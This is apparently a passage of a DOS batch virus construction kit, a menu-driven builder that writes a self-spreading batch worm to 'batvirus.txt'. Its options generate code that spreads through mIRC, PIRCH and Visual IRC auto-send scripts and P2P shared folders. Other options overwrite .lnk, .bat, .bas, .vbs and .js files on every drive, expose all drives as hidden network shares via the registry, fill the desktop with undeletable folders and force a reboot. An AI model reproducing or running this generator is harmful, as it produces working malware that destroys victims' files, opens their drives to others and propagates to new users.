%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\mirc\script.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\mirc32\script.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"mirc\script.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"mirc32\script.ini >nul">>%_%
%.% "echo.[Levels]>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.Enabled=1>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.Count=1>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.Level1="&c&">>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo."&c&"Enabled=1>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.["&c&"]>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.User1=*!*@*>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.UserCount=1>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.Event1=ON PART:#:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat "&Chr(124)&" /msg $nick WinUpdate>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.Event2=ON JOIN:#:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat "&Chr(124)&" /notice $nick Potential>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.Event3=ON TEXT:*fuck*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.Event4=ON TEXT:*sex*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.Event5=ON TEXT:*girl*:*:/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.EventCount=5>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% chr(37)&e&chr(37)&"pirch\events.ini >nul">>%_%
%.% chr(37)&e&chr(37)&"pirch98\events.ini >nul">>%_%
%.% chr(37)&e&chr(37)&"pirch32\events.ini >nul">>%_%
%.% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch\events.ini >nul">>%_%
%.% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch98\events.ini >nul">>%_%
%.% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"pirch32\events.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch\events.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch98\events.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\pirch32\events.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch\events.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch98\events.ini >nul">>%_%
%.% "copy %%windir%%\system\"&c&"\"&c&".ini c:\"&chr(37)&g&chr(37)&"pirch32\events.ini >nul">>%_%
%.% "echo.set z=CreateObject("&Chr(34)&"wscript.shell"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.z.regwrite "&Chr(34)&"HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17"&Chr(34)&","&Chr(34)&"dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%_%
ctty con
:006
cls
echo.
echo.
echo.
echo P2P worm
echo ÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Spread via p2p
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 007
if %!% 1 goto a11
goto done
:a11
cls
ctty nul
set -=&chr(37)&g&chr(37)&
%.% "copy %%0 c:\kazaa\myshar~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\mydown~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"applej~1\incoming\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"bearsh~1\shared\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"edonke~1\incoming\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"emule\incoming\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"grokster\mygrok~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"icq\shared~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"kazaa\myshar~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"kazaal~1\myshar~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"kmd\myshar~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"limewire\shared\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"morpheus\myshar~1\"&c&".bat >nul">>%_%
%.% "copy %%0 c:\"%-%"overnet\bundles\"&c&".bat >nul">>%_%
set -=
ctty con
:007
cls
echo.
echo.
echo.
echo LNK droping
echo ÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Spread via lnk files
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 008
if %!% 1 goto a12
goto done
:a12
cls
ctty nul
%.% "echo.set a=Wscript.CreateObject("&Chr(34)&"WScript.Shell"&Chr(34)&")>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.set b=a.CreateShortcut("&Chr(34)&"%windir%\system\"&c&"\"&c&".lnk"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.b.TargetPath=a.ExpandEnvironmentStrings("&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.b.WindowStyle=4>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.b.Save>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "for %%%%a in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %%windir%%\*.lnk %%path%%\*.lnk %%windir%%\desktop\*.lnk %%windir%%\system\*.lnk) do attrib -r -h -s -a %%%%a">>%_%
%.% "for %%%%a in (c:\*.lnk *.lnk ..\*.lnk c:\mydocu~1\*.lnk %%windir%%\*.lnk %%path%%\*.lnk %%windir%%\desktop\*.lnk %%windir%%\system\*.lnk) do copy %%windir%%\system\"&c&"\"&c&".lnk %%%%a /y">>%_%
%.% "for %%%%a in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%a:\nul copy %%windir%%\"&c&"\"&c&".lnk %%%%a:\funny.lnk /y">>%_%
ctty con
:008
cls
echo.
echo.
echo.
echo BAT infection
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Spread via bat files
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 009
if %!% 1 goto a13
goto done
:a13
cls
ctty nul
%.% "for %%%%b in (*.bat ..\*.bat c:\mydocu~1\*.bat %%windir%%\*.bat %%path%%\*.bat %%windir%%\desktop\*.bat %%windir%%\command\ebd\*.bat %%windir%%\system\*.bat) do attrib -r -h -s -a %%%%b">>%_%
%.% "for %%%%b in (*.bat ..\*.bat c:\mydocu~1\*.bat %%windir%%\*.bat %%path%%\*.bat %%windir%%\desktop\*.bat %%windir%%\command\ebd\*.bat %%windir%%\system\*.bat) do copy %%windir%%\system\"&c&"\tmpdelis.bat %%%%b /y">>%_%
%.% "for %%%%b in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%b:\nul copy %%windir%%\system\"&c&"\tmpdelis.bat %%%%b:\_tmpcfg.bat /y">>%_%
ctty con
:009
cls
echo.
echo.
echo.
echo BAS (Quick Basic) droping
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Spread via bas files
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 010
if %!% 1 goto a14
goto done
:a14
cls
ctty nul
%.% "echo.SHELL "&Chr(34)&"%%windir%%\system\"&c&"\tmpdelis.bat"&Chr(34)&">%%windir%%\system\"&c&"\"&c&".bas">>%_%
%.% "echo.END>>%%windir%%\system\"&c&"\"&c&".bas">>%_%
%.% "for %%%%c in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %%windir%%\*.bas %%path%%\*.bas %%windir%%\desktop\*.bas %%windir%%\system\*.bas) do attrib -r -h -s -a %%%%c">>%_%
%.% "for %%%%c in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %%windir%%\*.bas %%path%%\*.bas %%windir%%\desktop\*.bas %%windir%%\system\*.bas) do copy %%windir%%\system\"&c&"\"&c&".bas %%%%c /y">>%_%
%.% "for %%%%c in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%c:\nul copy %%windir%%\system\"&c&"\"&c&".bas %%%%c:\tmp_.bas /y">>%_%
ctty con
:010
cls
echo.
echo.
echo.
echo VBS & JS droping
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Spread via vbs & js files
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 011
if %!% 1 goto a15
goto done
:a15
cls
ctty nul
%.% "echo.set a=wscript.createobject("&Chr(34)&"wscript.shell"&Chr(34)&")>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.a.run "&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&", VBHide>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "for %%%%d in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %%windir%%\*.vb* %%path%%\*.vb* %%windir%%\desktop\*.vb* %%windir%%\system\*.vb*) do attrib -r -h -s -a %%%%d">>%_%
%.% "for %%%%d in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %%windir%%\*.vb* %%path%%\*.vb* %%windir%%\desktop\*.vb* %%windir%%\system\*.vb*) do copy %%windir%%\system\"&c&"\"&c&".vbs %%%%d /y">>%_%
%.% "for %%%%d in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%d:\nul copy %%windir%%\system\"&c&"\"&c&".vbs %%%%d:\tmp_.vbs /y">>%_%
%.% "echo.a=wscript.createobject("&Chr(34)&"wscript.shell"&Chr(34)&");>%%windir%%\system\"&c&"\"&c&".js">>%_%
%.% "echo.a.Run("&Chr(34)&"%windir%\system\"&c&"\tmpdelis.bat"&Chr(34)&");>>%%windir%%\system\"&c&"\"&c&".js">>%_%
%.% "for %%%%e in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %%windir%%\*.js* %%path%%\*.js* %%windir%%\desktop\*.js* %%windir%%\system\*.js*) do attrib -r -h -s -a %%%%e">>%_%
%.% "for %%%%e in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %%windir%%\*.js* %%path%%\*.js* %%windir%%\desktop\*.js* %%windir%%\system\*.js*) do copy %%windir%%\system\"&c&"\"&c&".js %%%%e /y">>%_%
%.% "for %%%%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %%comspec%% nul /f /c if exist %%%%e:\nul copy %%windir%%\system\"&c&"\"&c&".js %%%%e:\tmp_.js /y">>%_%
ctty con
:011
cls
echo.
echo.
echo.
echo Hidden Sharing
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Enable hidden sharing on all drives
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 012
if %!% 1 goto a16
goto done
:a16
cls
ctty nul
%.% "echo.REGEDIT4>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo.>>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan]>>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo.>>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo.[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\"&Chr(37)&Chr(37)&"1$]>>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo."&Chr(34)&"Flags"&Chr(34)&"=dword:00000302>>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo."&Chr(34)&"Parm1enc"&Chr(34)&"=hex:>>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo."&Chr(34)&"Parm2enc"&Chr(34)&"=hex:>>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo."&Chr(34)&"Path"&Chr(34)&"="&Chr(34)&Chr(37)&Chr(37)&"1:\\"&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo."&Chr(34)&"Remark"&Chr(34)&"="&Chr(34)&Chr(34)&">>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "echo."&Chr(34)&"Type"&Chr(34)&"=dword:00000000>>%%windir%%\system\"&c&"\"&c&".reg">>%_%
%.% "for %%%%f in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;t;s;t;u;v;w;x;y;z;a) do start regedit /s %%windir%%\system\"&c&"\"&c&".reg %%%%f>nul">>%_%
ctty con
:012
cls
echo.
echo.
echo.
echo Desktop payload
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Fill desktop with undeleatable folders
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 013
if %!% 1 goto a17
goto done
:a17
cls
ctty nul
set +=&Chr(124)&
set &=&Chr(62)&
set -=Chr(37)&i&Chr(37)&i&
echo.i="">>%_%
echo.j=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To j>>%_%
echo.i=i&chr(int(rnd(1)*120)+120)>>%_%
echo.next>>%_%
%.% "set "&i&"=md %%windir%%\desktop\">>%_%
%.% %-%"00 "%&%"nul "%+%" "&%-%"01 "%&%"nul "%+%" "&%-%"02 "%&%"nul "%+%" "&%-%"03 "%&%"nul">>%_%
%.% %-%"04 "%&%"nul "%+%" "&%-%"05 "%&%"nul "%+%" "&%-%"06 "%&%"nul "%+%" "&%-%"07 "%&%"nul">>%_%
%.% %-%"08 "%&%"nul "%+%" "&%-%"09 "%&%"nul "%+%" "&%-%"10 "%&%"nul "%+%" "&%-%"11 "%&%"nul">>%_%
%.% %-%"12 "%&%"nul "%+%" "&%-%"13 "%&%"nul "%+%" "&%-%"14 "%&%"nul "%+%" "&%-%"15 "%&%"nul">>%_%
%.% %-%"16 "%&%"nul "%+%" "&%-%"17 "%&%"nul "%+%" "&%-%"18 "%&%"nul "%+%" "&%-%"19 "%&%"nul">>%_%
%.% %-%"20 "%&%"nul "%+%" "&%-%"21 "%&%"nul "%+%" "&%-%"22 "%&%"nul "%+%" "&%-%"23 "%&%"nul">>%_%
%.% %-%"24 "%&%"nul "%+%" "&%-%"25 "%&%"nul "%+%" "&%-%"26 "%&%"nul "%+%" "&%-%"27 "%&%"nul">>%_%
%.% %-%"28 "%&%"nul "%+%" "&%-%"29 "%&%"nul "%+%" "&%-%"30 "%&%"nul "%+%" "&%-%"31 "%&%"nul">>%_%
%.% %-%"32 "%&%"nul "%+%" "&%-%"33 "%&%"nul "%+%" "&%-%"34 "%&%"nul "%+%" "&%-%"35 "%&%"nul">>%_%
%.% %-%"36 "%&%"nul "%+%" "&%-%"37 "%&%"nul "%+%" "&%-%"38 "%&%"nul "%+%" "&%-%"39 "%&%"nul">>%_%
%.% %-%"40 "%&%"nul "%+%" "&%-%"41 "%&%"nul "%+%" "&%-%"42 "%&%"nul "%+%" "&%-%"43 "%&%"nul">>%_%
%.% %-%"44 "%&%"nul "%+%" "&%-%"45 "%&%"nul "%+%" "&%-%"46 "%&%"nul "%+%" "&%-%"47 "%&%"nul">>%_%
%.% %-%"48 "%&%"nul "%+%" "&%-%"49 "%&%"nul "%+%" "&%-%"50 "%&%"nul "%+%" "&%-%"51 "%&%"nul">>%_%
%.% %-%"52 "%&%"nul "%+%" "&%-%"53 "%&%"nul "%+%" "&%-%"54 "%&%"nul "%+%" "&%-%"55 "%&%"nul">>%_%
%.% %-%"56 "%&%"nul "%+%" "&%-%"57 "%&%"nul "%+%" "&%-%"58 "%&%"nul "%+%" "&%-%"59 "%&%"nul">>%_%
%.% %-%"60 "%&%"nul "%+%" "&%-%"61 "%&%"nul "%+%" "&%-%"62 "%&%"nul "%+%" "&%-%"63 "%&%"nul">>%_%
%.% %-%"64 "%&%"nul "%+%" "&%-%"65 "%&%"nul "%+%" "&%-%"66 "%&%"nul "%+%" "&%-%"67 "%&%"nul">>%_%
%.% %-%"68 "%&%"nul "%+%" "&%-%"69 "%&%"nul "%+%" "&%-%"70 "%&%"nul "%+%" "&%-%"71 "%&%"nul">>%_%
%.% %-%"72 "%&%"nul "%+%" "&%-%"73 "%&%"nul "%+%" "&%-%"74 "%&%"nul "%+%" "&%-%"75 "%&%"nul">>%_%
%.% %-%"76 "%&%"nul "%+%" "&%-%"77 "%&%"nul "%+%" "&%-%"78 "%&%"nul "%+%" "&%-%"79 "%&%"nul">>%_%
%.% %-%"80 "%&%"nul "%+%" "&%-%"81 "%&%"nul "%+%" "&%-%"82 "%&%"nul "%+%" "&%-%"83 "%&%"nul">>%_%
%.% %-%"84 "%&%"nul "%+%" "&%-%"85 "%&%"nul "%+%" "&%-%"86 "%&%"nul "%+%" "&%-%"87 "%&%"nul">>%_%
%.% %-%"88 "%&%"nul "%+%" "&%-%"89 "%&%"nul "%+%" "&%-%"90 "%&%"nul "%+%" "&%-%"91 "%&%"nul">>%_%
%.% %-%"92 "%&%"nul "%+%" "&%-%"93 "%&%"nul "%+%" "&%-%"94 "%&%"nul "%+%" "&%-%"95 "%&%"nul">>%_%
%.% %-%"96 "%&%"nul "%+%" "&%-%"97 "%&%"nul "%+%" "&%-%"98 "%&%"nul "%+%" "&%-%"99 "%&%"nul">>%_%
%.% "for %%%%g in (%%windir%%\desktop\"&i&"*) do attrib +r +h +s +a %%%%g">>%_%
set +=|set -=|set &=
ctty con
:013
cls
echo.
echo.
echo.
echo Restart
echo ÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Restart after infection
echo.
echo 2 - Compile ...
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto done
if %!% 1 goto a18
goto done
:a18
cls
ctty nul
%.% "rundll32 shell32.dll,SHExitWindowsEx 2">>%_%
ctty con
:done
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo Compiling, please wait a few seconds ...
@echo °°°°°°°°°
ctty nul
@type nul|choice /n /cy /ty,1 >nul
ctty con
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo Compiling, please wait a few seconds ...
@echo ÛÛÛ°°°°°°
ctty nul
%.% "cls">>batvirus.vbs
echo.b.Close>>batvirus.vbs
cscript batvirus.vbs
ctty con
@type nul|choice /n /cy /ty,3 >nul
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo Compiling, please wait a few seconds ...
@echo ÛÛÛÛÛÛ°°°
@type nul|choice /n /cy /ty,3 >nul
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo Compiling, please wait a few seconds ...
@echo ÛÛÛÛÛÛÛÛÛ
@type nul|choice /n /cy /ty,3 >nul
ctty nul
deltree/y batvirus.vbs
set .=|set _=|set !=
ctty con
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo Your creation is now compiled in curent folder [batvirus.txt]
@echo Rename batvirus.txt to filename.bat
@echo.
@echo Press any key to exit ...
@pause >nul
:end
cls